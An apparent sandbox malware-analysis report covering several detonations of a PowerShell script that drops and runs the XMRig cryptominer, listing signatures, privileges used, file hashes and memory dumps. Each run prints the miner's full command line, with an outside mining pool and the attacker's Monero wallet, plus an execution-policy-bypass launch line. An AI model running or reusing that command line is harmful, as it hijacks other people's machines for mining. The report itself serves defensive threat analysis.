memory/2948-11-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-12-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-15-0x0000018B61FA0000-0x0000018B61FAA000-memory.dmp

memory/2948-14-0x0000018B61FC0000-0x0000018B61FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2508-46-0x000002C7A43B0000-0x000002C7A43D0000-memory.dmp

memory/2508-47-0x000002C7A4400000-0x000002C7A4420000-memory.dmp

memory/2508-48-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2948-49-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-50-0x00007FF9FFFB3000-0x00007FF9FFFB5000-memory.dmp

memory/2508-51-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-52-0x000002C7A4440000-0x000002C7A4460000-memory.dmp

memory/2508-53-0x000002C7A4420000-0x000002C7A4440000-memory.dmp

memory/2508-54-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-55-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-57-0x000002C7A4420000-0x000002C7A4440000-memory.dmp

memory/2508-56-0x000002C7A4440000-0x000002C7A4460000-memory.dmp

memory/2508-58-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-59-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-60-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-61-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-62-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-63-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-64-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-65-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-66-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-67-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-68-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-69-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-70-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-71-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-72-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-73-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-74-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-75-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-76-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-77-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-78-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-79-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-80-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-81-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-82-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-83-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-84-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-85-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-86-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-87-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-88-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-89-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-90-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-91-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-92-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-93-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-94-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-95-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-96-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-97-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-98-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-99-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-100-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-101-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-102-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-103-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-104-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-105-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-106-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-107-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-108-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-109-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-110-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-111-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-112-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-113-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-114-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-115-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-116-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 21:13
Platform win10v2004-20240508-en
Max time kernel 1790s
Max time network 1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrtggo01.asz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:39
Platform win10v2004-20240508-en
Max time kernel 1795s
Max time network 1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fngrahw4.lwn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:39
Platform win10-20240404-en
Max time kernel 1795s
Max time network 1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njbhqglk.04v.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:46
Platform win10-20240404-en
Max time kernel 1793s
Max time network 1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfqk2kdr.k55.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_samsfzpn.s2k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240426-en

Max time kernel

1788s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1wzc4qm.1hv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:45

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3g4hpsnm.te2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:46

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
